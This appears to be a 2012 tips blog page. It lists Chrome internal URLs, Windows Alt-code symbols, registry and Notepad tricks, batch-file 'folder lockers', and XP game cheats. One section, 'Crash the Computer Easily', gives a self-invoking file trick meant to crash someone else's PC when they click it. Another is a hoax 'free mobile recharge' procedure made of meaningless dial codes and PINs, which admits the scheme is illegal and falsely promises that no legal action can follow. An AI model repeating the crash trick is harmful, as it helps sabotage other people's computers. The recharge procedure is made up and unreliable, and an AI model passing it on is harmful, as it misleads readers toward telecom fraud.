Saturday 7 July 2012

GOOGLE CHROME EASTER EGGS ?

These Easter Eggs apply to Google Chromium + Chrome web browsers.
Chrome + Chromium about: links.
Some of these commands are undocumented, have been modified, updated, renamed and/or discontinued. Therefore not all of them exist in all browser versions, and some may have different names and/or changed functionality in newer browser builds.

    Things you can do with the built-in (internal) "about:" command [command names and all parameters are case insensitive], translated as "chrome://" into the browser [ending forward slash (/) after parameter name (chrome://parameter/) is optional]:
        about: (chrome://about/) = Chrome and built-in components + supported standards version info
        about:about (chrome://about/about/) = complete list of available about: (chrome://) commands; same as about:chrome-urls (chrome://chrome-urls/) (see further below)
        about:appcache-internals (chrome://appcache-internals/) = application caches info
        about:blank = new empty browser tab (window) with white background; see also "KILL IE ABOUT: URLS", also in REGISTRY.TXT [part of W95-11D.EXE]
        about:blob-internals (chrome://blob-internals/) = internal blob data info
        about:bookmarks (chrome://bookmarks/) = built-in Bookmark Manager
        about:bugreport (chrome://bugreport/) = built-in BugReport options (if any)
        about:cache = list of locally cached URLs (http:// + https:// protocols); same as about:view-http-cache (chrome://view-http-cache/) (see further below)
        about:chrome/help (chrome://chrome/help/) = built-in Help (About) page
        about:chrome-urls (chrome://chrome-urls/) = complete list of available about: (chrome://) commands; same as about:about (chrome://about/about/) (see further above)
        about:constrained-test (chrome://constrained-test/) = detailed constrained test
        about:crashes (chrome://crashes/) = list of all browser crashes (if any)
        about:credits (chrome://about/credits/) = list of all components + technologies used in Chrome with respective home page + license URLs
        about:conflicts (chrome://conflicts/) = list of all Modules loaded + registered (available for loading when needed) into Google Chrome and eventual conflicts (if any)
        about:devtools (chrome-devtools://devtools/) = list of available developer tools (Chrome developer builds only)
        about:dns (chrome://about/dns/) = list of all prefetched + preresolved DNS records + host names
        about:downloads (chrome://downloads/) = built-in Downloads Manager
        about:extensions (chrome://extensions/) = built-in Extensions Manager
        about:extension-icon (chrome://extension-icon/) = list of extensions icons
        about:favicon (chrome://favicon/) = built-in browser favicon
        about:flags (chrome://flags/) = list of all available configurable/customizable settings + features that can be disabled or enabled; similar to about:labs (chrome://labs/) (see further below)
        about:flash (chrome://flash/) = detailed info about (built-in or external) Flash plug-in
        about:gpu (chrome://gpu/) (newer browser versions) or about:gpu-internals (chrome://gpu-internals/) (older browser versions) = GPU Info tab: video hardware Graphics Processing Unit (GPU) + Chrome/Chromium features, status, version, driver info, diagnostics + logs; Profiling tab: moved under about:tracing (chrome://tracing/) (see further below)
        about:histograms (chrome://about/histograms/) = list of all available histograms + graphs
        about:history (chrome://history/) (older browser versions) = built-in browsing History Manager
        about:history2 (chrome://history2/) (newer browser versions) = built-in browsing History Manager with color coded URL interface + more features
        about:internets (chrome://internets/) [undocumented!] = "Internets": "Don't Clog the Tubes!" animated 3D pipes, similar to Windows 9x/NTx OpenGL screen saver ; must have sspipes.scr in %windir%\SYSTEM32 (Windows 2000/XP/2003/Vista/2008/7) for this to work [%windir% = usually C:\WINDOWS (WinXP/2003/Vista/2008/7) or C:\WINNT (Win2000)]; older Chrome builds only, newer builds display error 300 invalid URL web page ;-(
        about:ipc (chrome://ipc/) = IPC detailed info
        about:keyboard (chrome://keyboard/) = built-in default keyboard shortcuts + combos
        about:labs (chrome://labs/) = list of all available configurable/customizable settings + features that can be disabled or enabled; similar to about:flags (chrome://flags/) (see further above)
        about:media-internals (chrome://media-internals/) = list of Active audio streams + Cached resources (if any)
        about:memory (chrome://memory/) or chrome://about/memory/ (older browser versions) or chrome://memory-redirect/ (newer browser versions) = memory usage in multi-process browsing: summary + processes
        about:net-internals (chrome://net-internals/) = net internals info: data, proxy, events, DNS, sockets, SPDY, HTTP cache, HTTP throttling, SPIs, tests + HSTS
        about:network (chrome://network/) = I/O tracking info: list of all images, scripts + objects from a web page opened in a new tab
        about:newtab (chrome://newtab/) = opens a new browser tab
        about:objects (chrome://objects/) = list of all Objects on current web page
        about:plugins (chrome://plugins/) = installed plug-ins info + disable/enable separately each plug-in in case of problems
        about:print (chrome://print/) = built-in Print Manager
        about:quota-internals (chrome://quota-internals/) = 3 tabs detailed info:
            Summary: Summary + Misc Statistics
            Usage & Quota: Usage and Quota Database Browser
            Data: Dump
        about:sessions (chrome://sessions/) = list of Sessions (x) + Magic List (x) (if any)
        about:settings (chrome://settings/) = built-in Options (settings) Manager main screen [defaults to Basics screen if not followed by other available option after the forward slash (/)]; see below for available options
        about:settings/autofill (chrome://settings/autofill/) = built-in Options (settings) Manager Autofill Options screen
        about:settings/basics (chrome://settings/basics/) = built-in browser Options (settings) Manager Basics screen; same as about:settings/browser (chrome://settings/browser/) (see below)
        about:settings/browser (chrome://settings/browser/) = built-in browser Options (settings) Manager Basics screen; same as about:settings/basics (chrome://settings/basics/) (see above)
        about:settings/clearbrowserdata (chrome://settings/clearbrowserdata/) = built-in Options (settings) Manager Clear Browsing Data pop up window:
            Clear browsing history
            Clear download history
            Empty the cache
            Delete cookies and other site and plug-in data
            Clear saved passwords
            Clear saved Autofill form data
        about:settings/contentexceptions (chrome://settings/contentexceptions/) = built-in Options (settings) Manager Cookie and Site Data Exceptions screen (defaults to Cookie and Site Data Exceptions screen if not followed by other available option preceded by #); available options:
            about:settings/contentexceptions#cookies (chrome://settings/contentexceptions#cookies) = Cookie and Site Data Exceptions
            about:settings/contentexceptions#fullscreen (chrome://settings/contentexceptions#fullscreen) = Fullscreen Exceptions
            about:settings/contentexceptions#images (chrome://settings/contentexceptions#images) = Image Exceptions
            about:settings/contentexceptions#javascript (chrome://settings/contentexceptions#javascript) = JavaScript Exceptions
            about:settings/contentexceptions#location (chrome://settings/contentexceptions#location) = Geolocation Exceptions
            about:settings/contentexceptions#mouselock (chrome://settings/contentexceptions#mouselock) = Mouse Cursor Exceptions
            about:settings/contentexceptions#notifications (chrome://settings/contentexceptions#notifications) = Notifications Exceptions
            about:settings/contentexceptions#plugins (chrome://settings/contentexceptions#plugins) = Plug-in Exceptions
            about:settings/contentexceptions#popups (chrome://settings/contentexceptions#popups) = Pop-up Exceptions
        about:settings/cookies (chrome://settings/cookies/) = built-in Options (settings) Manager Cookies and Other Data screen
        about:settings/fonts (chrome://settings/fonts/) = built-in Options (settings) Manager Fonts and Encoding screen
        about:settings/handlers (chrome://settings/handlers/) = built-in Options (settings) Manager Protocol Handlers screen
        about:settings/importdata (chrome://settings/importdata/) = built-in Options (settings) Manager Import Bookmarks and Settings dialog box
        about:settings/languages (chrome://settings/languages/) = built-in Options (settings) Manager Languages screen
        about:settings/packextensionoverlay (chrome://settings/packextensionoverlay/) = built-in Options (settings) Manager Pack Extension dialog box
        about:settings/passwords (chrome://settings/passwords/) = built-in Options (settings) Manager Passwords screen
        about:settings/personal (chrome://settings/personal/) = built-in Options (settings) Manager Personal screen
        about:settings/searchengines (chrome://settings/searchengines/) = built-in Options (settings) Manager Search Engines screen
        about:settings/syncsetup (chrome://settings/syncsetup/) = built-in Options (settings) Manager Sync in with your Google Account dialog box
        about:settings/underthehood (chrome://settings/underthehood/) = built-in Options (settings) Manager Under the Hood screen
        about:stats (chrome://stats/) = Counters + Timers values, delta + time test benchmarks stats
        about:sync (chrome://sync/) = browser sync detailed info
        about:sync-internals (chrome://sync-internals/) = sync internals info: about, data, notifications, events + sync node browser
        about:syncpromo (chrome://syncpromo/) = Welcome to Google Chrome screen: set up Chrome with Google account, Google account sign in screen and link to back up and sync bookmarks, history + settings
        about:tcmalloc (chrome://about/tcmalloc/) = last page load/reload stats
        about:terms (chrome://about/terms/) = terms of service (TOS) agreement
        about:textfields (chrome://textfields/) = textfields detailed info (if any)
        about:tracing (chrome://tracing/) = Record tracing stats: records + displays keyboard key presses + mouse movement into buffer; Load: loads tracing stats from file; Save: saves tracing stats to file; about:gpu (chrome://gpu/) Profiling tab: moved here (see further above)
        about:version (chrome://about/version/) = Chrome and built-in components + supported standards version info
        about:view-http-cache (chrome://view-http-cache/) = list of locally cached URLs (http:// + https:// protocols); same as about:cache (see further above)
        about:workers (chrome://workers/) = list of Shared workers (if any): Id, URL, Name + Process id.

    Built-in (internal) "about:" commands with debug functions (self explanatory), which mimic an error or other situation that crashes/hangs/kills the browser:
        about:crash (chrome://crash/) = displays dark slate gray crash web page
        about:inducebrowsercrashforrealz (chrome://inducebrowsercrashforrealz/) = crashes the browser after which displays this dialog message:

            "Whoa! Google Chrome has crashed. Relaunch now?
                               OK       Cancel"

        about:kill (chrome://kill/) = displays indigo kill web page
        about:hang (chrome://hang/) = locks up the browser
        about:shorthang (chrome://shorthang/) = locks up the browser
        about:gpuclean (chrome://gpuclean/) = empty GPU (texture) buffer
        about:gpucrash (chrome://gpucrash/) = displays error 300 invalid URL web page
        about:gpuhang (chrome://gpuhang/) = displays error 300 invalid URL web page.
    Google Chrome crash + kill web pages display this message:

        "Aw, Snap!"

    CAUTION: These debug commands crash, hang or kill the browser! Use only if needed.

    More like these:
        Google Chrome's about: Pages.
        List of About Pages and Hidden Easter Eggs in Google Chrome Browser.
        Google Chrome's List of Special about: Pages.
        Google Chrome easter eggs.

Crash the Computer Easily ?



f u wnt to crash someone's PC just try this


Open a notepad
Type the following

start rabi.dat
rabi.dat
save the file as rabi.dat
by using right click you can change icon

once the file is created if some one is going to click it

the system will crash
HAPPY CRASHINGSSSS

plz give me reply if u like it

HUTCH, AIRTEL, & BSNL users...., Recharge every month free of chargee ?



hi everyone....If u have a cell phone,
Recharge ur phone every month freely by following this process
Please follow the instruction & you can recharge your SIM card absolutely free.
Yes it is possible, see how technology can be used to make technicians fool.

I just got a mail from a friend of mine, whose friend is B.Tech.(ETC) from IIT
Powai, teaching me how to reload my hand set every month for free. Engineered by
a group of rebel programmers. I am going to share this to all of you.

Please follow the instructions as stated below before you start it:
Applicable for HUTCH, AIRTEL, SPICE & BSNL users only ,sorry for idea,
BPL and Reliance users and it is done illegally of course. But there are many
things that are illegal in this world.
But then who cares. Don't worry nobody can trap you. No legal action can be
taken on you for this. So go ahead without worrying.

You can only do this every 24th & 25th of the month as the network system is
under upgrade.

1.) ** Dial " 1415007 " using your h/phone and wait for 5 second

2.) ** after 5 second, you will hear some funny noise (like sound from TV when
the station is finished)

3.) ** Once the noise stop, immediately dial 9151 follow by your phone number

4.) ** A recorded message "please insert your pin number" will follow

5.) ** punch in the pin number " 011785 45227 00734" and wait for the operator
finish repeating the above pin number.

6.) ** After the pin number has been repeat, dial " 0405-for AIRTEL, 404 -for
ORANGE (HUTCH)" . 403 -for BSNL"

7.) ** you will hear a message "for air time top-up press 1723" you just have to
follow the instruction

8.) ** After you follow the instruction, the noisy sound will re-appear for
about 5 second

9.) ** once the noise stop, dial " 4455147 " follow by " 146 "

10.) ** after about 5 second, dial " 1918 " after 3 second dial " 4451 "

11.) ** after you done that, punch in the serial number " 01174452271145527 "
you will hear dial tone.

12.) ** once the dialing tone stop, dial " 55524785933 " you will hear " please
key in your password"

13.) ** the password is " **** 2+253+7891*+546322 " wait for the message "your
password accepted"

14.) ** you will hear " please insert your emey number " now you have to be fast
to dial your own h/phone number
15.) ** you will hear a dialing tone, when the call is answered, dial " 1566 "
and you will hear "re-confirm emery number"

16.) ** once you hear that message, dial " 6011556 2245334 follow by your
h/phone number"

17.) ** after a while, you will hear a message "your pin number is accepted" you
have to dial " 1007 "

18.) ** after you done that you will hear "your emery number is accepted"

19.) ** continue dial " 4566 " you will hear "your password is accepted"

20.) ** once the second message finish, immediately dial your own h/phone number

21.) ** Now you will receive a message saying ...........

PDF Trick ?



Key combinations for Acrobat 6.0 & 7.0:
ctrl + shift + b ---> To hear the whole document
ctrl + shift + v ---> To hear only the page
ctrl + shift + c ---> To resume
ctrl + shift + e ---> To stop

ASCII Symbols ?

Press Alt + "Symbol Number" to Use the Symbol


Alt + 1 = ☺
Alt + 2 = ☻
Alt + 3 = ♥
Alt + 4 = ♦
Alt + 5 = ♣
Alt + 6 = ♠
Alt + 7 = •
Alt + 8 = ◘
Alt + 9 = ○
Alt + 10 = ◙
Alt + 11 = ♂
Alt + 12 = ♀
Alt + 13 = ♪
Alt + 14 = ♫
Alt + 15 = ☼
Alt + 16 = ►
Alt + 17 = ◄
Alt + 18 = ↕
Alt + 19 = ‼
Alt + 20 = ¶
Alt + 21 = §
Alt + 22 = ▬
Alt + 23 = ↨
Alt + 24 = ↑
Alt + 25 = ↓
Alt + 26 = →
Alt + 27 = ←
Alt + 28 = ∟
Alt + 29 = ↔
Alt + 30 = ▲
Alt + 31 = ▼
Alt + 32 =
Alt + 33 = !
Alt + 34 = "
Alt + 35 = #
Alt + 36 = $
Alt + 37 = %
Alt + 38 = &
Alt + 39 = '
Alt + 40 = (
Alt + 41 = )
Alt + 42 = *
Alt + 43 = +
Alt + 44 = ,
Alt + 45 = -
Alt + 46 = .
Alt + 47 = /
Alt + 48 = 0
Alt + 49 = 1
Alt + 50 = 2
Alt + 51 = 3
Alt + 52 = 4
Alt + 53 = 5
Alt + 54 = 6
Alt + 55 = 7
Alt + 56 = 8
Alt + 57 = 9
Alt + 58 = :
Alt + 59 = ;
Alt + 60 = <
Alt + 61 = =
Alt + 62 = >
Alt + 63 = ?
Alt + 64 = @
Alt + 65 = A
Alt + 66 = B
Alt + 67 = C
Alt + 68 = D
Alt + 69 = E
Alt + 70 = F
Alt + 71 = G
Alt + 72 = H
Alt + 73 = I
Alt + 74 = J
Alt + 75 = K
Alt + 76 = L
Alt + 77 = M
Alt + 78 = N
Alt + 79 = O
Alt + 80 = P
Alt + 81 = Q
Alt + 82 = R
Alt + 83 = S
Alt + 84 = T
Alt + 85 = U
Alt + 86 = V
Alt + 87 = W
Alt + 88 = X
Alt + 89 = Y
Alt + 90 = Z
Alt + 91 = [
Alt + 92 = \
Alt + 93 = ]
Alt + 94 = ^
Alt + 95 = _
Alt + 96 = `
Alt + 97 = a
Alt + 98 = b
Alt + 99 = c
Alt + 100 = d
Alt + 101 = e
Alt + 102 = f
Alt + 103 = g
Alt + 104 = h
Alt + 105 = i
Alt + 106 = j
Alt + 107 = k
Alt + 108 = l
Alt + 109 = m
Alt + 110 = n
Alt + 111 = o
Alt + 112 = p
Alt + 113 = q
Alt + 114 = r
Alt + 115 = s
Alt + 116 = t
Alt + 117 = u
Alt + 118 = v
Alt + 119 = w
Alt + 120 = x
Alt + 121 = y
Alt + 122 = z
Alt + 123 = {
Alt + 124 = |
Alt + 125 = }
Alt + 126 = ~
Alt + 127 = ⌂
Alt + 128 = Ç
Alt + 129 = ü
Alt + 130 = é
Alt + 131 = â
Alt + 132 = ä
Alt + 133 = à
Alt + 134 = å
Alt + 135 = ç
Alt + 136 = ê
Alt + 137 = ë
Alt + 138 = è
Alt + 139 = ï
Alt + 140 = î
Alt + 141 = ì
Alt + 142 = Ä
Alt + 143 = Å
Alt + 144 = É
Alt + 145 = æ
Alt + 146 = Æ
Alt + 147 = ô
Alt + 148 = ö
Alt + 149 = ò
Alt + 150 = û
Alt + 151 = ù
Alt + 152 = ÿ
Alt + 153 = Ö
Alt + 154 = Ü
Alt + 155 = ¢
Alt + 156 = £
Alt + 157 = ¥
Alt + 158 = ₧
Alt + 159 = ƒ
Alt + 160 = á
Alt + 161 = í
Alt + 162 = ó
Alt + 163 = ú
Alt + 164 = ñ
Alt + 165 = Ñ
Alt + 166 = ª
Alt + 167 = ▒
Alt + 168 = ¿
Alt + 169 = ⌐
Alt + 170 = ¬
Alt + 171 = ½
Alt + 172 = ¼
Alt + 173 = ¡
Alt + 174 = «
Alt + 175 = »
Alt + 176 = ░
Alt + 177 = ▒
Alt + 178 = ▓
Alt + 179 = │
Alt + 180 = ┤
Alt + 181 = ╡
Alt + 182 = ╢
Alt + 183 = ╖
Alt + 184 = ╕
Alt + 185 = ╣
Alt + 186 = ║
Alt + 187 = ╗
Alt + 188 = ╝
Alt + 189 = ╜
Alt + 190 = ╛
Alt + 191 = ┐
Alt + 192 = └
Alt + 193 = ┴
Alt + 194 = ├
Alt + 195 = ├
Alt + 196 = ─
Alt + 197 = ┼
Alt + 198 = ╞
Alt + 199 = ╟
Alt + 200 = ╚
Alt + 201 = ╔
Alt + 202 = ╩
Alt + 203 = ╦
Alt + 204 = ╠
Alt + 205 = ═
Alt + 206 = ╬
Alt + 207 = ╧
Alt + 208 = ╨
Alt + 209 = ╤
Alt + 210 = ╥
Alt + 211 = ╙
Alt + 212 = ╘
Alt + 213 = ╒
Alt + 214 = ╓
Alt + 215 = ╫
Alt + 216 = ╪
Alt + 217 = ┘
Alt + 218 = ┌
Alt + 219 = █
Alt + 220 = ▄
Alt + 221 = ▌
Alt + 222 = ▐
Alt + 223 = ▀
Alt + 224 = α
Alt + 225 = ß
Alt + 226 = Γ
Alt + 227 = π
Alt + 228 = Σ
Alt + 229 = σ
Alt + 230 = µ
Alt + 231 = τ
Alt + 232 = Φ
Alt + 233 = Θ
Alt + 234 = Ω
Alt + 235 = δ
Alt + 236 = ∞
Alt + 237 = φ
Alt + 238 = ε
Alt + 239 = ∩
Alt + 240 = ≡
Alt + 241 = ±
Alt + 242 = ≥
Alt + 243 = ≤
Alt + 244 = ⌠
Alt + 245 = ⌡
Alt + 246 = ÷
Alt + 247 = ≈
Alt + 248 = °
Alt + 249 = ∙
Alt + 250 = ·
Alt + 251 = √
Alt + 252 = ⁿ
Alt + 253 = ²
Alt + 254 = ■
Alt + 0128 = €
Alt + 0130 = ‚
Alt + 0131 = ƒ
Alt + 0132 = „
Alt + 0133 = …
Alt + 0134 = †
Alt + 0135 = ‡
Alt + 0136 = ˆ
Alt + 0137 = ‰
Alt + 0138 = Š
Alt + 0139 = ‹
Alt + 0140 = Œ
Alt + 0141 = []
Alt + 0142 = Ž
Alt + 0143 =
Alt + 0144 =
Alt + 0145 = ‘
Alt + 0146 = ’
Alt + 0147 = “
Alt + 0148 = ”
Alt + 0149 = •
Alt + 0150 = –
Alt + 0151 = —
Alt + 0152 = ˜
Alt + 0153 = ™
Alt + 0154 = š
Alt + 0155 = ›
Alt + 0156 = œ
Alt + 0157 =
Alt + 0158 = ž
Alt + 0159 = Ÿ
Alt + 0160 =
Alt + 0161 = ¡
Alt + 0162 = ¢
Alt + 0163 = £
Alt + 0164 = ¤
Alt + 0165 = ¥
Alt + 0166 = ¦
Alt + 0167 = §
Alt + 0168 = ¨
Alt + 0169 = ©
Alt + 0170 = ª
Alt + 0171 = «
Alt + 0172 = ¬
Alt + 0173 = ­­
Alt + 0174 = ®
Alt + 0175 = ¯
Alt + 0176 = °
Alt + 0177 = ±
Alt + 0178 = ²
Alt + 0179 = ³
Alt + 0180 = ´
Alt + 0181 = µ
Alt + 0182 = ¶
Alt + 0183 = ·
Alt + 0184 = ¸
Alt + 0185 = ¹
Alt + 0186 = º
Alt + 0187 = »
Alt + 0188 = ¼
Alt + 0189 = ½
Alt + 0190 = ¾
Alt + 0191 = ¿
Alt + 0192 = À
Alt + 0193 = Á
Alt + 0194 = Â
Alt + 0195 = Ã
Alt + 0196 = Ä
Alt + 0197 = Å
Alt + 0198 = Æ
Alt + 0199 = Ç
Alt + 0200 = È
Alt + 0201 = É
Alt + 0202 = Ê
Alt + 0203 = Ë
Alt + 0204 = Ì
Alt + 0205 = Í
Alt + 0206 = Î
Alt + 0207 = Ï
Alt + 0208 = Ð
Alt + 0209 = Ñ
Alt + 0210 = Ò
Alt + 0211 = Ó
Alt + 0212 = Ô
Alt + 0213 = Õ
Alt + 0214 = Ö
Alt + 0215 = ×
Alt + 0216 = Ø
Alt + 0217 = Ù
Alt + 0218 = Ú
Alt + 0219 = Û
Alt + 0220 = Ü
Alt + 0221 = Ý
Alt + 0222 = Þ
Alt + 0223 = ß
Alt + 0224 = à
Alt + 0225 = á
Alt + 0226 = â
Alt + 0227 = ã
Alt + 0228 = ä
Alt + 0229 = å
Alt + 0230 = æ
Alt + 0231 = ç
Alt + 0232 = è
Alt + 0233 = é
Alt + 0234 = ê
Alt + 0235 = ë
Alt + 0236 = ì
Alt + 0237 = í
Alt + 0238 = î
Alt + 0239 = ï
Alt + 0240 = ð
Alt + 0241 = ñ
Alt + 0242 = ò
Alt + 0243 = ó
Alt + 0244 = ô
Alt + 0245 = ²
Alt + 0246 = ö
Alt + 0247 = ÷
Alt + 0248 = ø
Alt + 0249 = ù
Alt + 0250 = ú
Alt + 0251 = ♥
Alt + 0252 = ü
Alt + 0253 = ý
Alt + 0254 = þ

convert ur pendrive into ram ?



Follow these steps :-

1. Insert the Pen Drive (1GB at least) in the USB port;
prefer 4GB if you can.
2. Let the PC do what it needs to do to detect it.
3. After it has finished its work, you have to act smart,

" Here goes the real thing "

4. Right Click on My Computer -> Properties
5. Advanced -> Performance Settings
6. Advanced -> Change
7. Select the Pen Drive
8. Click on Custom Size

" Check the value of space available "

9. Enter the same in the Initial and the Max columns

" You just used the space of the PenDrive as a Virtual Memory "

Restart...
" VOILA !!! Your PC is fast and furious "

Increase Folder View Size Limit to 8000 ?



Windows Registry Editor Version 5.00

; Delete the saved per-folder view settings so the new limit starts clean
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags]

; 0x00001f40 = 8000 remembered folder views
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell]
"BagMRU Size"=dword:00001f40

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam]
"BagMRU Size"=dword:00001f40

; 0 = allow Explorer to save view settings
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSaveSettings"=dword:00000000

1) Copy the code above
2) Open Notepad
3) Paste the code and save it as "bags8000.reg"
4) Merge the registry file by double-clicking it

Lock your Folder without any Software ?


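@ECHO OFF
cls
title Folder Locker
REM Note: the unlock password is stored in plain text in this file, and the
REM rename only changes how Explorer shows the folder; nothing is encrypted.

REM If the renamed (locked) folder exists, ask for the password.
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
REM First run: create the Locker folder.
if NOT EXIST Locker goto MDLOCKER

:CONFIRM
echo Are you sure you want to lock the folder (Y/N)
set "cho="
set /p "cho=>"
REM Quoted, case-insensitive comparison; also safe when the input is empty.
if /I "%cho%"=="Y" goto LOCK
if /I "%cho%"=="N" goto END
echo Invalid choice.
goto CONFIRM

:LOCK
REM Rename Locker to the Control Panel CLSID name and mark it hidden + system.
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto END

:UNLOCK
echo Enter password to unlock folder
set "pass="
set /p "pass=>"
REM Replace the text inside the right-hand quotes with your own password.
if NOT "%pass%"=="type your password here" goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder unlocked successfully
goto END

:FAIL
echo Invalid password
goto END

:MDLOCKER
md Locker
echo Locker created successfully
goto END

:END
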
- Now paste it in Notepad.
- Save it as a batch file (with extension .bat). Any name will do.
- Now you see a batch file. Double-click it to create a folder locker.
- A new folder named Locker will be created at the same location.
- Now move all the files you want to hide into the Locker folder.
- Now double-click the batch file to lock the folder named Locker.
- If you want to unlock your files, double-click the batch file again and you will be prompted for the password. Enter the password and enjoy access to the folder.

Make Your Computer TALK!



Firstly open notepad,

Then copy and paste the below mentioned texts

Code:


Dim userInput


userInput = InputBox("Write a message for me to say")



Set Sapi = Wscript.CreateObject("SAPI.SpVoice")

Sapi.speak userInput

then save it in any name that you like but at the end don't forget to add .vbs

example.
talk.vbs

After you save close notepad, and open the saved file.

There you will see a place to type



In that above mentioned place Type the words, or sentences that you like, after that press OK!!!!

Then you can see your computer talking!!!


Enjoy!!!

WINDOWS XP secrets :?

Windows XP Secrets
Notepad Secrets
Create a log

   1. Open Notepad
   2. On the very first line, type in ".LOG" (without quotes) then press Enter for a new line
   3. Now you can type in some text if you want, then save the file.
   4. Next time when you open the file, notice its contents. Notepad automatically adds a time/date log everytime you open the file.

Text becomes unreadable

   1. Open Notepad
   2. On the very first line, type in "dont eat the donut" (without quotes) then save and close the file. Note: the file should have only one line of the text above.
   3. Now, open the same file. You'll notice the text becomes unreadable squares. (try this with different text with the same format and length).


Paint Secrets
Create a trail image

   1. Open Paint, then open an image.
   2. Right-click on the image and select "Select All"
   3. Now hold the "Shift" key and move the image around. The image will be drawn with trail.

10x Zoom

   1. Open Paint, then open a small image.
   2. Select the zoom "Magnifier" tool.
   3. Windows Paint lists out the zoom options from 1x to 8x, but there is a 10x...
   4. After selecting the Magnifier tool, point the mouse right at the border line right under "8x" and left-click. There you go.. the hidden 10x.

Other Secrets
Where is the relaxing music that you've heard during Windows XP Installation?

   1. The file is in:
      C:\Windows\system32\oobe\images\title.wma

Game Secrets
Solitaire: Instant Win

   1. Press Alt + Shift + 2 to instantly win

Solitaire: Draw only 1 card (instead of 3)

   1. Hold down Ctrl + Alt + Shift then click on unopen cards to draw.

FreeCell: Instant Win

   1. Hold down Ctrl + Shift + F10 while playing, then click Abort.
   2. Now move one card.

FreeCell: Hidden Game Modes

   1. Go to "Game" menu choose "Select Game"
   2. Here you can choose from game mode 1 to 1,000,000. But -1 and -2 will also work (hidden modes)

Hearts: Show All Card

   1. Warning! This requires a modification to your registry. Be sure you follow the steps carefully. Damaging your registry might damage your Windows installation. Open the "Registry Editor" by: "Start" >> "Run" then type "regedit" and press Enter
   2. Expand to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts
   3. Right-click on the right panel and create a new String value with the name "ZB"
   4. Double-click to open this key "ZB" to edit its value. Then enter "42" and close the Registry Editor.
   5. Start Hearts and Press Ctrl + Alt + Shift + F12 to show all the cards

Minesweeper: Stop The Timer

   1. When you start to play a new game, the timer is ticking...
   2. Press Windows Key + D to show desktop.
   3. Now come back to the game by selecting it from the taskbar. The timer is stopped.

Pinball

   1. Unlimited Balls: Type bmax at a new game to get unlimited balls (no notification).
   2. Extra Balls: Type 1max at a new game to get extra balls.
   3. Gravity Well: Type gmax at a new game to activate Gravity Well.
   4. Promotion: Type rmax at a new game or while playing to get instant promotion and raising rank.
   5. Extra points with partial shots: Partially shot the ball just to pass the yellow light bars. There are 6 bars. With the first bar, you'll get 15,000 points, 2nd: 30,000,...
   6. Test Mode: Type hidden test with a new ball or new game. Now you can use your mouse to drag and move the ball where you want.

How to make a private folder?



Suppose you want to lock the folder games in d: which has the path D:\Games
In the same drive create a text file and type
ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat

create another text file and type in it
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games
Now save this text file as key.bat

Now you can see 2 batch files, loc and key. Press loc and the folder games will change to Control Panel and you cannot view its contents. Press key and you will get back your original folder.
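The rename used in this post and in the Folder Locker batch file only changes how Explorer presents the folder; the directory and its files stay on disk under the new name. The following is an added example, not part of the original post, that audits a directory tree for folders carrying such a .{CLSID} suffix; the function names and the sample file report.txt are made up for the demonstration.

```python
import os
import re
import tempfile

# A folder name ending in ".{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}" is shown by
# Explorer as the shell object with that CLSID instead of as a normal folder.
CLSID_SUFFIX = re.compile(
    r"\.\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$"
)


def find_clsid_folders(root):
    """Return (path, name_without_suffix, entry_count) for each disguised folder."""
    hits = []
    for dirpath, dirnames, _filenames in os.walk(root):
        for name in dirnames:
            match = CLSID_SUFFIX.search(name)
            if match:
                full = os.path.join(dirpath, name)
                # The contents are still listed by ordinary file APIs.
                hits.append((full, name[:match.start()], len(os.listdir(full))))
    return sorted(hits)


def demo():
    """Build a constructed sample tree and audit it."""
    with tempfile.TemporaryDirectory() as root:
        locked = os.path.join(
            root, "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
        )
        os.makedirs(locked)
        with open(os.path.join(locked, "report.txt"), "w") as handle:
            handle.write("constructed sample file\n")
        os.makedirs(os.path.join(root, "games"))  # ordinary folder, not flagged
        return [
            (os.path.relpath(path, root), shown, count)
            for path, shown, count in find_clsid_folders(root)
        ]


if __name__ == "__main__":
    for path, shown, count in demo():
        print(f"{path}: base name {shown!r}, {count} entries readable")
```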

Set a jpg image in your drives background ?



First create a file in drive named desktop.ini

then open it in notepad and insert below lines


Code:


[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=path
iconarea_text=0x00ffffff

Replace path with your jpg,bmp image path

  • iconarea_text=0x00ffffff is for text color
0x00ffffff is for white color
0x00000000 is for black color


NOTE :- don't edit [{BE098140-A513-11D0-A3A4-00C04FD706EC}]


If you need your drive back as default just delete the desktop.ini

it is not working for folders

Hiding A Drive ?


1) Go to Start -> Run -> “regedit”
2) Navigate to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3) Choose Edit -> New -> DWORD Value and give name NoDrives.
4) Double click NoDrives and determine which drive that you want to vanish in Value Data.

Eg: If you wish to vanish drive E:, insert value 16 in Value Data.

The combination value in “Value Data” are as following:
A: > 1
B: > 2
C: > 4
D: > 8
E: > 16
F: > 32
G: > 64
H: > 128
I: > 256
J: > 512
K: > 1024
L: > 2048
M: > 4096
All: > 67108863

Changing the default port of telnet ?


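The default port of the telnet server can be changed; the default port for telnet is usually 23. Changing the port does not protect the session: telnet still sends everything, including logins, in clear text.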

tlntadmn config port=port number

eg

tlntadmn config port=1234

makes the default telnet port 1234

Locking Drives (without any software)



Locking Drives:

